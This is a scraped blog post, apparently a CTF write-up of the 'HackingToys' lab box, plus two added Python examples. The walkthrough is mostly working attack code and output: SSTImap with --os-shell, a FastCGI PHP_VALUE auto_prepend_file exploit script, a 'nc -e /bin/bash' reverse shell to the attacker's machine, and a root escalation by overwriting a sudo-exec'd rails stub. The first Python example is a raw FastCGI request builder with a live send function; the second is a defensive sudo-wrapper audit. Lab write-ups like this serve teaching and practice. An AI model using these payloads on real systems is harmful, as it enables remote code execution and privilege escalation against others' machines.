src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907104304272\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5176\u4ed6\u529e\u6cd5<\/h3>\n<p>\u542ctao\u795e\u8bf4\u4f3c\u4e4e\u53ef\u4ee5\u5de5\u5177\u4e00\u628a\u68ad\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ tinja url -u &quot;https:\/\/192.168.10.101:3000\/search?query=121&amp;message=Product+does+not+exist&quot;                   \nTInjA v1.1.3 started at 2024-09-06_22-50-34\n\nAnalyzing URL(1\/1): https:\/\/192.168.10.101:3000\/search?query=121&amp;message=Product+does+not+exist\n===============================================================\nStatus code 200\nAnalyzing query parameter  message  =&gt;  [Product does not exist]\n[*] Value  O4MQGSCJNBYDUYO4  of query parameter  message  is being reflected 1 time(s) in the response body\n\n[!] The polyglot &lt;%&#039;${{\/#{@}}%&gt;{{ triggered an error: Status Code 500\n[*] The polyglot p &quot;&gt;[[${{1}}]] returned the response(s) [unmodified]\n[!] 
The polyglot &lt;%=1%&gt;@*#{1} was rendered in a modified way: [1@*#{1}]\n[*] The polyglot &lt;%=1%&gt;@*#{1} returned the response(s) [1@*#{1}]\n[*] The polyglot {##}\/*{{.}}*\/ returned the response(s) [unmodified]\n\nA template injection was detected and the template engine is now being identified.\n[*] The polyglot &lt;% returned the response(s) [empty]\n[+] A template engine was detected, but could not be identified (certainty: Low)\n\nAnalyzing query parameter  query  =&gt;  [121]\nNo errors are thrown and input is not being reflected.\nNo template engine could be detected\n\n===============================================================\n\nSuccessfully finished the scan\n[+] Suspected template injections: 1\n[+] 0 Very High, 0 High, 0 Medium, 1 Low, 0 Very Low certainty\n\nDuration: 634.186726ms\nAverage polyglots sent per user input: 3<\/code><\/pre>\n<p>\u770b\u4e0a\u53bb\u4e0d\u592a\u9614\u4ee5\u54e6\uff0c\u6362\u4e00\u4e2a\u5de5\u5177\uff1a<\/p>\n<pre><code class=\"language-bash\"># cd \/\n# git clone https:\/\/github.com\/vladko312\/SSTImap.git\n# cd SSTImap\n# pip install -r requirements.txt --no-warn-script-location\n# sudo ln -s \/home\/kali\/SSTImap\/sstimap.py \/usr\/sbin\/sstimap\nsstimap -u &quot;https:\/\/192.168.10.101:3000\/search?query=aaaaa&amp;message=Product+does+not+exist&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157965.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157965.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907110119451\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">sstimap -u &quot;https:\/\/192.168.10.101:3000\/search?query=aaaaa&amp;message=Product+does+not+exist&quot; --os-shell<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157966.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157966.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907110341400\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) lidia@hacktoys:\/home\/lidia\/.local$ cat start_rails.sh \n#!\/bin\/bash\n\nsource \/etc\/profile.d\/rvm.sh\ncd \/opt\/app\/gadgets\/\nrake db:drop\nrake db:create\nrake db:migrate\nrails db:seed\nexec \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails server -b &#039;ssl:\/\/0.0.0.0:3000?key=\/opt\/app\/gadgets\/certs\/server.key&amp;cert=\/opt\/app\/gadgets\/certs\/server.crt&#039;\n\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ ls -la \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n-rwxrwxr-x 1 root rvm 566 May 20 13:51 \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ ss -tnlup\nNetid           State            Recv-Q           Send-Q                       Local Address:Port                       Peer Address:Port           Process                                  \nudp             UNCONN           0                0                                  0.0.0.0:68                              0.0.0.0:*                                                       \ntcp             LISTEN           0                511                              127.0.0.1:80                              0.0.0.0:*                                                       \ntcp             LISTEN           0                1024                               0.0.0.0:3000                            0.0.0.0:*               users:((&quot;ruby&quot;,pid=506,fd=7))           \ntcp             LISTEN           0                128                                0.0.0.0:22                              0.0.0.0:*                                                       \ntcp             LISTEN           0                4096                             127.0.0.1:9000                            0.0.0.0:*                                                       \ntcp             LISTEN           0                128                                   [::]:22                                 [::]:*<\/code><\/pre>\n<h3>9000 \u7aef\u53e3<\/h3>\n<p>\u8f6c\u53d1\u4e00\u4e0b80\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) lidia@hacktoys:\/tmp$ .\/socat TCP-LISTEN:8080,fork TCP4:127.0.0.1:80&amp;\n[1] 1314\n(remote) 
lidia@hacktoys:\/tmp$ .\/socat TCP-LISTEN:9001,fork TCP4:127.0.0.1:9000&amp;\n[2] 1318<\/code><\/pre>\n<p>socat now listens on every interface on port 9001 and hands each incoming connection (<code>fork<\/code> spawns a child per client, so the forward survives repeated requests) to the FastCGI service that is bound only to 127.0.0.1:9000. The port is reachable from the attacking machine.<\/p>\n<p>Test it following the FastCGI notes in HackTricks: <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi<\/a>. The script sends one FastCGI request through the forwarded port with <code>cgi-fcgi<\/code>. Its <code>PHP_VALUE<\/code> parameter asks PHP to <code>auto_prepend_file<\/code> a <code>data:\/\/<\/code> URL carrying our base64-encoded PHP, so the payload runs before the existing <code>index.php<\/code>; the HTML comment markers make the command output easy to find. Whether <code>allow_url_include<\/code> can really be switched on per request depends on the PHP SAPI and version; on this target it worked, as the output below shows.<\/p>\n<pre><code 
class=\"language-bash\">#!\/bin\/bash\n\n# PHP to execute on the target; the &lt;!-- --&gt; markers delimit the command output\nPAYLOAD=&quot;&lt;?php echo &#039;&lt;!--&#039;; system(&#039;whoami&#039;); echo &#039;--&gt;&#039;;&quot;\nFILENAMES=&quot;\/var\/www\/html\/index.php&quot; # Existing file path on the target\n\nHOST=$1\nB64=$(echo &quot;$PAYLOAD&quot;|base64)\n\nfor FN in $FILENAMES; do\n    OUTPUT=$(mktemp)\n    # cgi-fcgi sends its environment as FastCGI params; PHP_VALUE carries\n    # per-request ini settings, here an auto_prepend_file pointing at a data:\/\/ URL\n    env -i \\\n      PHP_VALUE=&quot;allow_url_include=1&quot;$&#039;\\n&#039;&quot;allow_url_fopen=1&quot;$&#039;\\n&#039;&quot;auto_prepend_file=&#039;data:\/\/text\/plain\\;base64,$B64&#039;&quot; \\\n      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \\\n      cgi-fcgi -bind -connect $HOST:9001 &amp;&gt; $OUTPUT\n\n    cat $OUTPUT\ndone<\/code><\/pre>\n<p>Change the command to <code>id<\/code> and see whether it executes:<\/p>\n<pre><code class=\"language-bash\"># command changed to id\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ .\/exp.sh 192.168.10.101\nContent-type: text\/html; charset=UTF-8\n\n&lt;!--dodi\nuid=1001(dodi) gid=1001(dodi) groups=1001(dodi),100(users)\n--&gt;\n..........<\/code><\/pre>\n<p>Code execution works, and the PHP worker runs as <code>dodi<\/code>, a different account from the <code>lidia<\/code> shell used to set up the forward. Next, a reverse shell: only the payload changes, to <code>nc -e<\/code> back to the attacking machine.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ head -n 10 exp.sh\n#!\/bin\/bash\n\nPAYLOAD=&quot;&lt;?php echo &#039;&lt;!--&#039;; system(&#039;nc -e \/bin\/bash 192.168.10.102 2345&#039;); echo &#039;--&gt;&#039;;&quot;\nFILENAMES=&quot;\/var\/www\/html\/index.php&quot; # Existing file path\n\nHOST=$1\nB64=$(echo &quot;$PAYLOAD&quot;|base64)\n\nfor FN in $FILENAMES; do\n    OUTPUT=$(mktemp)<\/code><\/pre>\n<p>A shell as <code>dodi<\/code> comes back on port 2345.<\/p>\n<h3>Privilege escalation to root<\/h3>\n<pre><code class=\"language-bash\">(remote) dodi@hacktoys:\/home\/dodi$ sudo -l\nMatching Defaults entries for dodi on hacktoys:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser dodi may run the following commands on hacktoys:\n    (ALL : ALL) NOPASSWD: \/usr\/local\/bin\/rvm_rails.sh\n(remote) dodi@hacktoys:\/home\/dodi$ cat \/usr\/local\/bin\/rvm_rails.sh\n#!\/bin\/bash\nexport rvm_prefix=\/usr\/local\nexport MY_RUBY_HOME=\/usr\/local\/rvm\/rubies\/ruby-3.1.0\nexport RUBY_VERSION=ruby-3.1.0\nexport rvm_version=1.29.12\nexport rvm_bin_path=\/usr\/local\/rvm\/bin\nexport GEM_PATH=\/usr\/local\/rvm\/gems\/ruby-3.1.0:\/usr\/local\/rvm\/gems\/ruby-3.1.0@global\nexport GEM_HOME=\/usr\/local\/rvm\/gems\/ruby-3.1.0\nexport PATH=\/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin:\/usr\/local\/rvm\/gems\/ruby-3.1.0@global\/bin:\/usr\/local\/rvm\/rubies\/ruby-3.1.0\/bin:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/usr\/local\/rvm\/bin\nexport IRBRC=\/usr\/local\/rvm\/rubies\/ruby-3.1.0\/.irbrc\nexport rvm_path=\/usr\/local\/rvm\nexec \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails &quot;$@&quot;\n(remote) dodi@hacktoys:\/home\/dodi$ ls -la \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n-rwxrwxr-x 1 root rvm 566 May 20 13:51 \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n(remote) dodi@hacktoys:\/home\/dodi$ cat \/etc\/group | grep rvm\nrvm:x:1002:lidia,root<\/code><\/pre>\n<p>The chain: <code>dodi<\/code> may run <code>\/usr\/local\/bin\/rvm_rails.sh<\/code> as root without a password; the wrapper only exports RVM environment variables and then <code>exec<\/code>s <code>\/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails<\/code>; that file is group-writable (<code>rwxrwxr-x<\/code>) by <code>rvm<\/code>, and the members of <code>rvm<\/code> are <code>lidia<\/code> and <code>root<\/code>. So the <code>lidia<\/code> shell obtained earlier can rewrite whatever the root-level <code>exec<\/code> runs. GTFOBins lists shell escapes for ruby (<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/ruby\/#shell\">https:\/\/gtfobins.github.io\/gtfobins\/ruby\/#shell<\/a>), but the rails stub does not even need Ruby: replace it with a one-line script that starts bash.<\/p>\n<pre><code class=\"language-bash\">(remote) lidia@hacktoys:\/opt\/app\/gadgets$ echo &#039;\/bin\/bash&#039; &gt; \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails<\/code><\/pre>\n<p>Then, as <code>dodi<\/code>, run the wrapper through sudo. The overwritten file has no shebang, but when <code>execve<\/code> fails with ENOEXEC bash runs the file as a shell script itself, so the root wrapper ends up executing <code>\/bin\/bash<\/code> as root.<\/p>\n<p>Got root.<\/p>\n<p>The underlying mistake is a sudo rule whose target execs a file under a path that non-root accounts can write; a NOPASSWD wrapper is only as safe as every file it calls.<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=TpriR9yuJKU\">https:\/\/www.youtube.com\/watch?v=TpriR9yuJKU<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1nzHdegEfh\/?spm_id_from=333.999.0.0&amp;vd_source=8981ead94b755f367ac539f6ccd37f77\">https:\/\/www.bilibili.com\/video\/BV1nzHdegEfh\/?spm_id_from=333.999.0.0&vd_source=8981ead94b755f367ac539f6ccd37f77<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>HackingToys Information gathering Port scan \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToy 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-797","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/797","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=797"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/797\/revisions"}],"predecessor-version":[{"id":798,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/797\/revisions\/798"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=797"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=797"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=797"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
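The exploit script in the write-up relies on cgi-fcgi to speak the FastCGI protocol. The following Python is an added example, not code from the write-up, from HackTricks or from the box author: it builds the same request by hand (FCGI_BEGIN_REQUEST, FCGI_PARAMS carrying the PHP_VALUE trick, FCGI_STDIN) and parses the FCGI_STDOUT and FCGI_END_REQUEST records that come back, so the exchange is visible byte by byte. The host, port, script path and PHP payload are assumptions, and the sample response is constructed to look like the `id` run on the page.

```python
"""Build and parse FastCGI records by hand (added example, not the page's own code).
Mirrors what cgi-fcgi does in the exploit script: BEGIN_REQUEST + PARAMS + STDIN out,
STDOUT/END_REQUEST back. Host, port, script path and PHP payload are assumptions."""
import base64
import socket
import struct

FCGI_VERSION, FCGI_RESPONDER = 1, 1
FCGI_BEGIN_REQUEST, FCGI_END_REQUEST = 1, 3
FCGI_PARAMS, FCGI_STDIN, FCGI_STDOUT, FCGI_STDERR = 4, 5, 6, 7

def encode_length(n):
    """Name/value lengths: one byte below 128, else four bytes with the top bit set."""
    return bytes([n]) if n < 128 else struct.pack("!I", n | 0x80000000)

def encode_name_value(name, value):
    name_b, value_b = name.encode(), value.encode()
    return encode_length(len(name_b)) + encode_length(len(value_b)) + name_b + value_b

def encode_record(rec_type, content, request_id=1):
    """8-byte FCGI_Header (version, type, requestId, contentLength, paddingLength,
    reserved) + content + zero padding up to an 8-byte boundary."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack("!BBHHBB", FCGI_VERSION, rec_type, request_id, len(content), padding, 0)
    return header + content + b"\x00" * padding

def build_request(params, body=b"", request_id=1):
    """One complete responder request; an empty PARAMS/STDIN record closes each stream."""
    begin = struct.pack("!HB5x", FCGI_RESPONDER, 0)  # role, flags (no keep-conn), reserved
    out = encode_record(FCGI_BEGIN_REQUEST, begin, request_id)
    out += encode_record(FCGI_PARAMS, b"".join(encode_name_value(k, v) for k, v in params.items()), request_id)
    out += encode_record(FCGI_PARAMS, b"", request_id)
    if body:
        out += encode_record(FCGI_STDIN, body, request_id)
    return out + encode_record(FCGI_STDIN, b"", request_id)

def php_prepend_params(script_path, php_code):
    """Same PHP_VALUE trick as the bash script: prepend a data:// URL to an existing
    script. The other CGI variables are the usual minimum a PHP FastCGI worker expects."""
    b64 = base64.b64encode(php_code.encode()).decode()
    php_value = "\n".join([
        "allow_url_include=1",
        "allow_url_fopen=1",
        # written exactly as in the page's script, backslash before the ';' included
        "auto_prepend_file='data://text/plain\\;base64,%s'" % b64,
    ])
    return {"GATEWAY_INTERFACE": "FastCGI/1.0", "REQUEST_METHOD": "POST",
            "SCRIPT_FILENAME": script_path, "SCRIPT_NAME": script_path,
            "REMOTE_ADDR": "127.0.0.1", "SERVER_NAME": "localhost", "SERVER_PORT": "80",
            "CONTENT_LENGTH": "0", "PHP_VALUE": php_value}

def parse_response(data):
    """Walk the records the worker sends back; return (stdout, stderr, appStatus)."""
    stdout, stderr, app_status, pos = b"", b"", None, 0
    while pos + 8 <= len(data):
        _ver, rec_type, _rid, length, padding, _res = struct.unpack("!BBHHBB", data[pos:pos + 8])
        content = data[pos + 8:pos + 8 + length]
        pos += 8 + length + padding
        if rec_type == FCGI_STDOUT:
            stdout += content
        elif rec_type == FCGI_STDERR:
            stderr += content
        elif rec_type == FCGI_END_REQUEST:
            app_status, _proto_status = struct.unpack("!IB3x", content)
            break
    return stdout, stderr, app_status

def extract_marked_output(stdout):
    """Pull the command output out of the <!-- ... --> markers the payload emits."""
    text = stdout.decode(errors="replace")
    start, end = text.find("<!--"), text.find("-->")
    return text[start + 4:end].strip() if start != -1 and end > start else None

def send_request(host, port, params, timeout=5):
    """Live use against the socat-forwarded port (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(params))
        chunks = []
        while chunk := sock.recv(65536):
            chunks.append(chunk)
    return parse_response(b"".join(chunks))

# Constructed sample response, shaped like the `id` run in the write-up, for offline parsing.
SAMPLE_RESPONSE = (
    encode_record(FCGI_STDOUT, b"Content-type: text/html; charset=UTF-8\r\n\r\n"
                  b"<!--dodi\nuid=1001(dodi) gid=1001(dodi) groups=1001(dodi),100(users)\n-->\n")
    + encode_record(FCGI_STDOUT, b"")
    + encode_record(FCGI_END_REQUEST, struct.pack("!IB3x", 0, 0))
)

def demo():
    """Parse the sample and return (appStatus, extracted command output)."""
    out, _err, status = parse_response(SAMPLE_RESPONSE)
    return status, extract_marked_output(out)

if __name__ == "__main__":
    print(demo())
```

The live form is `send_request(host, 9001, php_prepend_params("/var/www/html/index.php", "<?php echo '<!--'; system('id'); echo '-->';"))`; `demo()` exercises only the parser, offline. Because the worker reports an application status in FCGI_END_REQUEST and keeps FCGI_STDERR separate, a failed prepend (for example when the data:// wrapper is refused) shows up as an empty marked section with the PHP warning on stderr rather than as a silent miss.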
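The root step in the write-up hinges on a chain: a NOPASSWD sudo rule, a wrapper that execs another file, and that file being writable by a group with a non-root member. The Python below is an added example rather than anything from the write-up: it turns that reasoning into a check, taking the wrapper text, the `ls -l` line and the /etc/group line shown on the page (copied here as constructed sample input, wrapper abridged) and reporting which non-root accounts can rewrite the exec target. The function names are this example's own.

```python
"""Audit a sudo-allowed wrapper for an exec target that non-root accounts can modify
(added example, not from the write-up). The wrapper, `ls -l` line and /etc/group line
are copied from the page as constructed sample input; function names are this
example's own."""
import re
import stat

# Sample input taken from the write-up (wrapper abridged to the lines that matter).
WRAPPER = """#!/bin/bash
export rvm_prefix=/usr/local
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"
"""
LS_LINE = "-rwxrwxr-x 1 root rvm 566 May 20 13:51 /usr/local/rvm/gems/ruby-3.1.0/bin/rails"
GROUP_LINES = ["rvm:x:1002:lidia,root"]

def exec_target(script_text):
    """Path handed to the last `exec` in the wrapper: that is what really runs as root."""
    target = None
    for line in script_text.splitlines():
        m = re.match(r"\s*exec\s+(\S+)", line)
        if m:
            target = m.group(1)
    return target

def parse_ls_line(line):
    """Turn an `ls -l` line into (mode bits, owner, group, path)."""
    perms, _links, owner, group, *_rest, path = line.split()
    bits = 0
    for i, ch in enumerate(perms[1:10]):  # rwxrwxrwx; 's'/'t' imply execute, 'S'/'T' do not
        if ch in "rwxst":
            bits |= 1 << (8 - i)
    return bits, owner, group, path

def parse_groups(lines):
    """/etc/group lines -> {group name: set of supplementary members}.
    Users whose primary group (in /etc/passwd) is this group are not listed here."""
    groups = {}
    for line in lines:
        name, _pw, _gid, members = line.strip().split(":")
        groups[name] = {m for m in members.split(",") if m}
    return groups

def non_root_writers(mode, owner, group, groups):
    """Accounts other than root that may rewrite the file ('*' means everyone)."""
    who = set()
    if mode & stat.S_IWUSR and owner != "root":
        who.add(owner)
    if mode & stat.S_IWGRP:
        who |= {m for m in groups.get(group, set()) if m != "root"}
    if mode & stat.S_IWOTH:
        who.add("*")
    return who

def audit(wrapper_text, ls_line, group_lines):
    """Return (exec target, non-root accounts that can rewrite it). Empty set = clean."""
    target = exec_target(wrapper_text)
    mode, owner, group, path = parse_ls_line(ls_line)
    if path != target:
        raise ValueError("ls line is for %s but the wrapper execs %s" % (path, target))
    return target, non_root_writers(mode, owner, group, parse_groups(group_lines))

if __name__ == "__main__":
    target, writers = audit(WRAPPER, LS_LINE, GROUP_LINES)
    print("sudo wrapper execs %s; writable by non-root: %s" % (target, sorted(writers) or "nobody"))
```

A clean result is an empty set; on the page's input it names lidia, which is exactly the account used to overwrite the rails stub. The check reads only supplementary members from /etc/group, so a user whose primary group is rvm would be missed, and it does not examine the gem `bin` directories the wrapper puts at the front of PATH, which would matter if the exec line used a bare command name instead of an absolute path.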